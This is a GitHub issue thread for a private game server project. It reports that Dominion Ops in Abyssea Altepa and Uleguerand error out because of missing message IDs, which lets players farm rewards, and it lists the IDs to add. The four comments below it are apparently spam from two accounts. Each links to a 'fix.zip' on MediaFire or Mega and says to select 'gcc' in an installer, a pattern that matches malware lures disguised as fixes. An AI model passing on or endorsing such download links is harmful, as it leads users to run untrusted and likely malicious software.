### ISSUE TITLE
🐛 Abyssea - Dominion Ops error out before event finish

### ISSUE THREAD

**Issue by FFXILevelDown** [DerpyProjectGroup/topaz#6160]
Dominion Operations in Abyssea Altepe & Uleguerand error out on Ops completion in dominion.lua line 152 function completeDominionOp, line 223 and 231 in sergeantOnEventFinish due to no ID in zones/##/IDs. This causes the quest to never complete and allows players to continuously receive crour, xp, dominion points. 

**_I affirm:_**
- [x] I understand that if I do not agree to the following points by completing the checkboxes my issue will be ignored.
- [X] I have read and understood the [Contributing Guide](https://github.com/LandSandBoat/server/blob/base/CONTRIBUTING.md) and the [Code of Conduct](https://github.com/LandSandBoat/server/blob/base/CODE_OF_CONDUCT.md).
- [X] I have searched existing [issues](https://github.com/LandSandBoat/server/issues) to see if the issue has already been opened, and I have checked the commit log to see if the issue has been resolved since my server was last updated.

## Branch affected by issue 

`base`

## Steps to reproduce
fulfilled requirements on DO #14 Uleguerand and could just spam talking to npc to get rewards. 

## Expected behavior

Needs to be added in IDs - 
Abyssea-Altepa
        OBTAINS_DOMINION_NOTES        = 7880,  -- <name> obtains <number> Dominion note[/s] (Total: <number>).
        DOMINION_SIGNED_ON            = 10415, -- You have signed on for Dominion Ops!
        CANCELED_OBJECTIVE            = 10416, -- You have canceled your objective.
Abyssea-Uleguerand
        OBTAINS_DOMINION_NOTES        = 7780,  -- <name> obtains <number> Dominion note[/s] (Total: <number>).
        DOMINION_SIGNED_ON            = 10300, -- You have signed on for Dominion Ops!
        CANCELED_OBJECTIVE            = 10301, -- You have canceled your objective.

![dominion ops](https://github.com/user-attachments/assets/a5ffe367-da76-4e92-afd8-a932d33cab17)

![dominionops1](https://github.com/user-attachments/assets/97488452-96d8-4edc-bac3-0da35b06cdc7)
![Screenshot 2024-08-24 at 6 02 21 PM](https://github.com/user-attachments/assets/703b5111-1434-4f06-a24d-138bbaaa1458)

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
